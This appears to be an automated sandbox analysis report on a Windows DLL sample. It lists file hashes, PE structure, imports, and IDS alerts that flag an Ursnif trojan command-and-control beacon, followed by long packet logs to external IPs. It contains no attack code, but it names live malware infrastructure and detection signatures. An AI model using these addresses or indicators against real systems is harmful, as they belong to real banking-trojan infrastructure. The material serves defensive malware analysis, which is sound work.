SHA-256: | 32047EECD93791D81841F92A215EA93F8D440AF4CEAF5F4F81218B16B04AA651 |
SHA-512: | 333579733B7534821166910F0F01F68E750AD5037DE0820C39066AFB2ABDADE7D508EC8F7CECBA28D64FD0F2798366EDB8E2DC283EC73D0DE48ECB3417965C4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.341443763648944 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KH1DE81eKaM5DqBVKVrdFAMBJTH:Akka6ApE8wKxDcVKdBJj |
MD5: | 64FC9FE15499D831A5DF89DAB5CB482D |
SHA1: | B84EC157DD794CF98DD0962F145A5EA06ADC1908 |
SHA-256: | CC8EB0375870D71E1D9717D30B1116D98073F09AEF2CB35B5E52A4606208ECC0 |
SHA-512: | 4E09F378EB5AB87C890099EDEE500E989BA976F74A48C6B354E76A3BD9F886F9A1958A4F82806219813D2C90003F03A50344E630689B474F8465BF29B15FF941 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.263540312571727 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f4UQjGzxs7+AEszIWXp+N23f4UQjb:p37Lvkmb6KHQUQjGWZE8QUQjb |
MD5: | 477ACFF0C9318FD1D57EB124DD1CB3A1 |
SHA1: | C242FD81B3CA732BAE16741B42A184555DEF96E9 |
SHA-256: | 3D341688B0354573EA4C9332F2BC9CA27D2DA741367596542A508A138B1FE075 |
SHA-512: | 7A296532E591C4CD9FD5EE0646714641B3E345F9FCB72F51A06D7EAB4B975AA2F6E3F64CA212253DEDE1E74901A9A741C64C1D95AEAF5F7E20D49C01315BC41A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6194715442407794 |
Encrypted: | false |
SSDEEP: | 24:etGS08OmU0t3lm85xWAseO4z05Q64pfUPtkZfR940VUWI+ycuZhN7akStPNnq:6OXQ3r5xNOdQfUuJD4s31ul7a33q |
MD5: | 25BFE19F5986DCBA41CF9C32255099CB |
SHA1: | 72C5BA8E1E513BDF107844B644E93EACB835EEE5 |
SHA-256: | 76E736E89441E0448FAD32891FC3E2C56E03489D8C1D93EFFCE717FE29864A27 |
SHA-512: | A8CB76EE9E312B8E48A3D3FD34AD262316544F38700AF6E4BACE1030B40DAD5D70C1F1BDC4DCF41C474F8FCE6FBE5F450FFF39D0D5A5052D41412F7949689114 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.3358411405116986 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KHBoE8BnKaM5DqBVKVrdFAMBJTH:Akka6ABoE8BnKxDcVKdBJj |
MD5: | BBF9AF951E167FF72BC18FEE6E40D104 |
SHA1: | 95CC2C7CABE3C97A41E1F3FB03F49C77D68C8004 |
SHA-256: | B4F8937851B30FC1378EA0F64F5BB5D58F8C8E6D2FFA28BE818292269E69713E |
SHA-512: | 4AA72DD4100CF01CBECAAE9918598E60D19898E5B30BC7B87A25656AB1EFC734CD87F6BBBC838C0E843F0E22923C5B7095A97D987BC7660D492480BFC8633EF7 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.688098.e0lviBuJ.20220504162647.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1355 |
Entropy (8bit): | 5.379018260547288 |
Encrypted: | false |
SSDEEP: | 24:BxSAB6xvBn1Zx2DOXUW0j2LCH1c4qW+HjeTKKjX4CIym1ZJXJBj2LCH1c4NenxS7:BZovh/oOsJ1c4t+qDYB1ZZJ1c4aZZpC |
MD5: | 82ED31B7989163CA4F97487D125F8090 |
SHA1: | F8AA109361CA6BAB2D8A076E6567C452C62C7D8F |
SHA-256: | FA90D37462B816EBEDC2BCC4AFF455B582FF43596073690DE7DC1834B68A1E9F |
SHA-512: | 87E4259453324C28D55561DC04D75ACD5C9E5918B6EB908B4A1339637AC9A6C950512D14A4D4E7C39AF173CAE606FC8AF987B131E4A2294B8262A48D8535C4DA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.238623900640168 |
TrID: |
|
File name: | XoVzWJQAQ0.dll |
File size: | 442368 |
MD5: | 81bdb4c3b30de72ad49b98a4977063c4 |
SHA1: | 2b173296dd75395b37d7c5775dd16003c2349a19 |
SHA256: | 9c2a2b8d88ab02d37e21c9b97f10b26543daedf353ce76c17b445688b0a041d6 |
SHA512: | d4289d9a23e1b26dcc1a9977cb1b784903e8163b8f439e848e5eb91f5af19d9c506cb9ae02ab33f27557fa245dcd62392f521e22a26aae2019f1dc374548e782 |
SSDEEP: | 6144:ripWDjyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:ripsFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | 1794F14977A11DBBEC0807760CF8C51B9B66BE2CA23A34DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02142305417 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180419921875 | data | 3.71608775679 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373819986979 | data | 6.02758758015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:26:18.722944 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.3 | 13.107.42.16 |
05/04/22-16:26:39.201905 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
05/04/22-16:26:39.682098 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
05/04/22-16:26:38.797354 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:26:39.101716042 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101752996 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101887941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101942062 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101955891 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101974964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102000952 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102318048 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102345943 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102360964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102387905 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102423906 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102437019 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102489948 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102507114 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102576971 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117383003 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117428064 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117448092 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117470980 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117496014 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117512941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117526054 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117537022 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117561102 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117577076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117600918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117614031 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117625952 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117641926 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117655039 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117693901 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117820978 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117846012 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117861032 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117892981 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117939949 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117961884 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117991924 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117997885 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118016958 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118031025 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118041039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118084908 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118099928 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118103981 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118108988 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118125916 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118175983 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118262053 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118288994 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118314028 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118329048 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118347883 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118355989 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118360043 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118372917 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118396997 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118412971 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118417978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118434906 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118457079 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118482113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118498087 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118513107 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118519068 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118520975 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118541956 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118545055 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118568897 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118585110 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118592024 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118618011 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118927956 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118953943 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118977070 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118999004 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119000912 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119018078 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119029999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119079113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119124889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119139910 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119174004 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119200945 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119223118 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119223118 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119240999 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119246960 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119323969 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119349957 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119371891 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119375944 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119400978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119400978 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119412899 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119421959 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119461060 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119510889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135061979 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135130882 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135174990 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135212898 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135245085 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135261059 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135286093 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135313988 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135325909 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135353088 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135365963 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135394096 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135406971 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135436058 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135437965 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135476112 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135477066 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135516882 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135555029 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135555983 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135597944 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135607958 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135622978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135637045 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135668039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135668993 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135703087 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135708094 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135751009 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135793924 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135793924 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135824919 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135835886 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135863066 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135875940 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135904074 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135915995 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135931015 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135941982 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135981083 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135993958 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136020899 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136046886 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136060953 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136094093 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136101961 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136112928 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136142015 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136171103 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136210918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136214972 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136250973 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136291981 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136296988 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136327982 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136332035 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136362076 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
